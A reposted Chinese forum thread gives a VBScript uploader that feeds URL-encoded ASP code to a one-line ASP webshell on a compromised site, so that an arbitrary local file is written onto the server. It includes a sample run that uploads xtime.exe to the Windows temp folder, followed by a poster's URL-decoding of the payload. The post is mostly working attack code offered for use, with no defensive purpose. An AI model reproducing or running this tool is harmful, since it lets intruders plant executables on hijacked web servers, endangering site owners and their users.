[转载]一句话木马用upfile.vbs
信息来源:情感网络with wscript
if .arguments.count<2 then .quit
ffn=replace(.arguments(1),"\","%5C"):ffn=replace(ffn,":","%3A"):ffn=replace(ffn,"~","%7E")
url= "[url]http://www.xxxx.com/a.asp?a=with+server.createobject%28%22adodb.stream%22%29%0D%0A.type%3D1%0D%0A.open%0D%0A.write+request.binaryread%28request.totalbytes%29%0D%0A.savetofile+%22[/url]"&ffn&"%22%2C2%0D%0Aend+with%0D%0AResponse.end"
fn=.arguments(0)
end with
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject("microsoft.xmlhttp")
.open "post",url,false:.send s
wscript.echo .statustext
end with
F:\tools\upfile>cscript upfile.vbs f:\tools\xtime.exe c:\windows\temp\xtime.exe
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。
OK 这段代码被删除很多东西,我也看不懂 [quote][url]http://www.xxxx.com/a.asp?a=with+server.createobject%28%22adodb.stream%22%29%0D%0A.type%3D1%0D%0A.open%0D%0A.write+request.binaryread%28request.totalbytes%29%0D%0A.savetofile+%22[/url]"&ffn&"%22%2C2%0D%0Aend+with%0D%0AResponse.end[/quote]
大概解密为
[code]http://www.xxxx.com/a.asp?a=with+server.createobject("adodb.stream")
.type=1
.open
.write+request.binaryread(request.totalbytes)
.savetofile+""&ffn&"",2
end+with
Response.end[/code]
其他有少量垃圾代码。也许好明白一点了
[s:66] [s:66] [s:66] [s:66]
页:
[1]